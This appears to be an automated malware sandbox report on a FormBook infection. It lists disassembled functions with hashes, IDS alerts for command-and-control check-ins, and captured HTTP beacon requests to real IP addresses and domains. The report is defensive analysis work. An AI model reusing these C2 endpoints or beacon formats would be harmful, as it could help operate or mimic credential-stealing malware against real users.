Function 00EE2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f779cee244747bceac34d683646b40ebbc03b2553f40cdd12d8dee0822fe69
Instruction ID: 86c1d86acce0a5b6822ddb95af4191933ed7916cf9372c342fdc08221c83c3af
Opcode Fuzzy Hash: 40f779cee244747bceac34d683646b40ebbc03b2553f40cdd12d8dee0822fe69
Instruction Fuzzy Hash: 2F90027134180842D64071584515B160005C7E2301F55D026E2065554D8B19CD626126

Function 00EE3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d59a81d0b97f396b555e82aadbb2909c9b64bd2d718d33c6c25969776bd720f7
Instruction ID: 42e6a28aa2e2346e88e172079d8993715f11bb282a6e546dfc4e752689d81c1d
Opcode Fuzzy Hash: d59a81d0b97f396b555e82aadbb2909c9b64bd2d718d33c6c25969776bd720f7
Instruction Fuzzy Hash: AE90023124180C02D680715885157170006C7D1701F55D022A1025554D8B16CA7566B1

Function 00EE3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5677c606110bfa454f81b7f47f3cc067041a4130d20857eace529d5c2df04502
Instruction ID: 9fab85778c9c3e17952e1127ed7d61e8151da7f2b3a5a807a2b34a34b2a9b93c
Opcode Fuzzy Hash: 5677c606110bfa454f81b7f47f3cc067041a4130d20857eace529d5c2df04502
Instruction Fuzzy Hash: 27900231201C4842D68072584905B1F4105C7E2302F95D02AA5157554CCE15C9655721

Function 00EE39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97a3235bf2664be3e702bb8a9a59fa2b69a24a09b7a785b0b7f2516f41fbea8
Instruction ID: 5ab16d076466bdca0cfb30e8c91d5482b61f6dadf017aa6bf324a3ffec786629
Opcode Fuzzy Hash: a97a3235bf2664be3e702bb8a9a59fa2b69a24a09b7a785b0b7f2516f41fbea8
Instruction Fuzzy Hash: 3B90023124585502D690715C45056264005E7E1301F55D032A1815594D8A55C9656221

Function 00EE2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 9c6f154b8f1f3d41e2194e349a58a6d7c48d11edacad4c89be3f9805a339b9f0
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 00EE2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00EE293C
___swprintf_l.LIBCMT ref: 00EE295E
___swprintf_l.LIBCMT ref: 00EE29A3
___swprintf_l.LIBCMT ref: 00F1A52E

Strings

ffff:, xrefs: 00F1A504
::%hs%u.%u.%u.%u, xrefs: 00F1A527
:%u.%u.%u.%u, xrefs: 00F1A5B8
::ffff:0:%u.%u.%u.%u, xrefs: 00F1A54E

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 7e01aa0515ba1762671168d7d70e15503ffd4e19e51b0a8e774908ecea5ebeeb
Instruction ID: 4286cb6a8ff0d8217c7e77be58b97ded8dd88e615ea2fb16dc394fb8cbbba8c7
Opcode Fuzzy Hash: 7e01aa0515ba1762671168d7d70e15503ffd4e19e51b0a8e774908ecea5ebeeb
Instruction Fuzzy Hash: 905139B6A0425ABFCB14DFA9888097EF7FCBB48300B14A12DE559E3242D374DE40D7A0

Function 00F52410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00F524A6
___swprintf_l.LIBCMT ref: 00F524E2
___swprintf_l.LIBCMT ref: 00F5257D
___swprintf_l.LIBCMT ref: 00F525A3
___swprintf_l.LIBCMT ref: 00F525C8
___swprintf_l.LIBCMT ref: 00F52608

Strings

ffff:, xrefs: 00F5247D, 00F5249D
:%u.%u.%u.%u, xrefs: 00F525FF
::ffff:0:%u.%u.%u.%u, xrefs: 00F524DA
::%hs%u.%u.%u.%u, xrefs: 00F5249E

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: f587f89135820634e66575981a1ae2450272b5c3e80854b9229656eb8b5f0974
Instruction ID: 0baf52b1a111e690ab2ba08bf45fe0f9beb07dca18b3d2fc791657ef65f03e3f
Opcode Fuzzy Hash: f587f89135820634e66575981a1ae2450272b5c3e80854b9229656eb8b5f0974
Instruction Fuzzy Hash: 9E512871A00645AECF74CF6CCC8097FB7F9EF45301B148519EA95D3682E6B4DE089760

Function 00ED7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 00F14787
ExecuteOptions, xrefs: 00F146A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00F146FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00F14655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00F14742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00F14725
Execute=1, xrefs: 00F14713

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 944a2cc82cfea3f9716598892a0f26e932a969f3a146eb4c15a474b7adfcc506
Instruction ID: 6544d0158f4fed64205360ecc73fa5cdc7aba2ec25e445f9c385aa78883e4d0a
Opcode Fuzzy Hash: 944a2cc82cfea3f9716598892a0f26e932a969f3a146eb4c15a474b7adfcc506
Instruction Fuzzy Hash: 4E513831604219BADF10ABA4DC86FE977B8EF04304F1414EAE509BB2D1F771EE469B50

Function 00EEB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 00EEB6BF

Strings

0, xrefs: 00EEB695
+, xrefs: 00EEB65A
0, xrefs: 00EEB66F
-, xrefs: 00EEB650

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: f81c9152332a6978546756017d8f4a9e078e94818e0a38fa8f7ed6ed58877644
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 3781B070E052CE9EDF288E6AC8517FFBBB6AF85314F18625AE851B7691C7348C40CB54

Function 00F520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00F5214F
___swprintf_l.LIBCMT ref: 00F52172

Strings

]:%u, xrefs: 00F52169
%%%u, xrefs: 00F52146
[, xrefs: 00F5212B

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: e63b2b2a7b9d516daed02a1360aacf82e81d23a33728d856252775703dbc92bb
Instruction ID: 368337dea064ed9a0b7db7e4340a5b84fd4d3a63a643223fbd396ea812688a09
Opcode Fuzzy Hash: e63b2b2a7b9d516daed02a1360aacf82e81d23a33728d856252775703dbc92bb
Instruction Fuzzy Hash: 29218176E00219ABCB10DF79CC40ABFB7E8AF55754F040216EE05E3241EB309A059BA0

Function 00ECF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00F102BD
RTL: Re-Waiting, xrefs: 00F1031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00F102E7

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: ecffece411f7f79c8abbe968f049eaa5cc1084ff144ce5a383f615d78d90d23e
Instruction ID: 9d96ecb32b9640a02943fd1edc33e8e3f042f7da41b671aa153145f2341fa753
Opcode Fuzzy Hash: ecffece411f7f79c8abbe968f049eaa5cc1084ff144ce5a383f615d78d90d23e
Instruction Fuzzy Hash: EDE1F130604741DFD725CF28C984B6AB7E1BF84324F240A2DF4A5AB2E1DBB5D985DB42

Function 00EDB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F1728C

Strings

RTL: Resource at %p, xrefs: 00F172A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00F17294
RTL: Re-Waiting, xrefs: 00F172C1

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: f1b2d46409fc4bfa570c0268f3604e8ba9ba62076815c9d1faab2fb061f23ba2
Instruction ID: 18c674282505360b502cb554350b65cbd2bca8f0deefac4bc8f7258b0d223cb3
Opcode Fuzzy Hash: f1b2d46409fc4bfa570c0268f3604e8ba9ba62076815c9d1faab2fb061f23ba2
Instruction Fuzzy Hash: 1641F631604356ABC710EE25CC41BA6B7B5FB54720F201629F959E7381EB31E846ABD1

Function 00F52300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00F5238D
___swprintf_l.LIBCMT ref: 00F523B3

Strings

%%%u, xrefs: 00F52384
]:%u, xrefs: 00F523AA

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 7b4015d4d57612578e6c67a9595abca808961fbf4de8876912d270b1557e46e6
Instruction ID: 4d17ece6bdd6a88f05f55323ea10ceccf75e7b557e647edffa11a426987f8816
Opcode Fuzzy Hash: 7b4015d4d57612578e6c67a9595abca808961fbf4de8876912d270b1557e46e6
Instruction Fuzzy Hash: F331A272A002189FCB60DF29CC40BEEB7F8EB45711F440596ED49E3241EB34AE489BA0

Function 00EA9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 00EA9191
@, xrefs: 00EA9175

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: dea96dbc39dcbd95b1e4cc7ac7b68a03522157951579e3d9ecc2f974a6ff071a
Instruction ID: 7aee43bcb5ffa1b0fbcd9b86330b3fb7e635c67d069d2f5af54aad2afd285b09
Opcode Fuzzy Hash: dea96dbc39dcbd95b1e4cc7ac7b68a03522157951579e3d9ecc2f974a6ff071a
Instruction Fuzzy Hash: 3D814972D002699BDB75CB54CC45BEEB7B8AF08710F0541EAE909B7291E7309E80DFA0

Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 4x nop then xor eax, eax	3_2_02989AC0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 4x nop then pop edi	3_2_0298DF8F
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 4x nop then mov ebx, 00000004h	3_2_031C04DE

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 62.149.128.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 62.149.128.40:80
Source: Network traffic	Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49738 -> 62.149.128.40:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49752 -> 62.149.128.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49806 -> 185.99.134.9:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49793 -> 185.99.134.9:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49822 -> 185.99.134.9:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 62.149.128.40:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49838 -> 185.99.134.9:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49994 -> 217.76.128.34:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50014 -> 217.76.128.34:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 217.76.128.34:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 203.161.46.201:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 209.146.101.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 209.146.101.85:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 209.146.101.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50010 -> 217.76.128.34:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 103.42.108.46:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 203.161.46.201:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 209.146.101.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 103.42.108.46:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 103.42.108.46:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 203.161.46.201:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 103.42.108.46:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 203.161.46.201:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 85.159.66.93:80

Source: Joe Sandbox View	IP Address: 62.149.128.40 62.149.128.40
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT
Source: Joe Sandbox View	ASN Name: KKRUS KKRUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wpye/?GHcxP=10HpjR&DX3L=BI3NUQzh1Y0aSVFpIlwXAyDki6kTKkkQhFQYkuvpiSdvxBH4iFlEbnV8tqZ2t35htM7z3AOv1Vp0NfxeBIyvsGNDHWPWavPfmrFZb+Np2iJLfzkfEMuMkRM= HTTP/1.1Host: www.sendly.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /sumy/?DX3L=8uNUhaiSR/1/jShpTjhrq7Pmn2ok3vFsrk+NeNeMT9gsX+dRqQojmTXAgjpwTcKCwG3dOpoH/XUFLyUWF1WG3kwUjYogFhCYahwErm+e78ofLc2PLMFplIY=&GHcxP=10HpjR HTTP/1.1Host: www.admaioraluxury.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /oesh/?GHcxP=10HpjR&DX3L=HCc66xuFwsYaoV7p1lMXVJ1POfLKV24vpmMkT+/QNEwp4qKgnbX1o8A6WiOmDTIb5Dz6WGc//wMiFSP8UWm4ITpofh+nmR+jMbFHhJ0Xuj7SUgPN0FkAu9U= HTTP/1.1Host: www.tyc01054.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /0cl8/?DX3L=7HxCQdnCh6ivjE0ntiopTSmplpvI5fDkg/YKKxsbVifsbdigzeMptTDrL+40/PciyLTBq8c+Jpt1mE1pIfRkKRilJ8TaIQL8aAdiAz60fknD8NEi45Da4b0=&GHcxP=10HpjR HTTP/1.1Host: www.le-pier.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ptpp/?DX3L=lihxIN19PO2foZESUJiQ3jjEy7fYejBWrNgJsJ+GMwRxuOrK8IfyZznUQBbQ3AvnNmKJlNWcNUn8sc5ShkrmAdK6H0xx+zYVCkBQ46T9I5md+kA4CLmwBFE=&GHcxP=10HpjR HTTP/1.1Host: www.37wx.babyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /q8x9/?DX3L=nDuE/WKonXHccB/Npvc1wya31B/8njvmYttvVQz9nE6rY7FmXcq3hPkCGiECb5+sICVq9kePsPDLk25b8MaJPifZL3aVnk95LzBLAowBkxPp52MWxr+effo=&GHcxP=10HpjR HTTP/1.1Host: www.avantfize.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /x6m4/?DX3L=aMFgpwbmby3jzMbor6S4pB4U7i9WzusTmpcKkMa0AEKKjLWQjqx1br6ZlFdOkGxZA2zGMf8USW80p6x1SUSuJRL7eqdfJHqn6H1d/R32OLL8G1qZhdp9bUU=&GHcxP=10HpjR HTTP/1.1Host: www.zippio.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /amgg/?DX3L=JHBUhbwVlEY6ntdxvhNUx5tRlK91uXcwNHGnc+bm3N1hwsEBwOeL7N/Dy0HCt1TwyxcZSIFyMlI4p5K/Rb4a3V+poZ0/+zQh3GfvquCJzleYxHpI/yPEUU4=&GHcxP=10HpjR HTTP/1.1Host: www.alanshortz.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /9qeb/?GHcxP=10HpjR&DX3L=bjWP7v7ghBDzXzyUz1pTmuBWkZf8Gbbxz/lu39Kx9tYOJM2dcjRzdERKOpdTxXm5FHukDI2cLaYm1fi8ZVMT+/mexgX4lNkHmuy2vWEgUyuWeWm6+/LtdWg= HTTP/1.1Host: www.mtmoriacolives.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
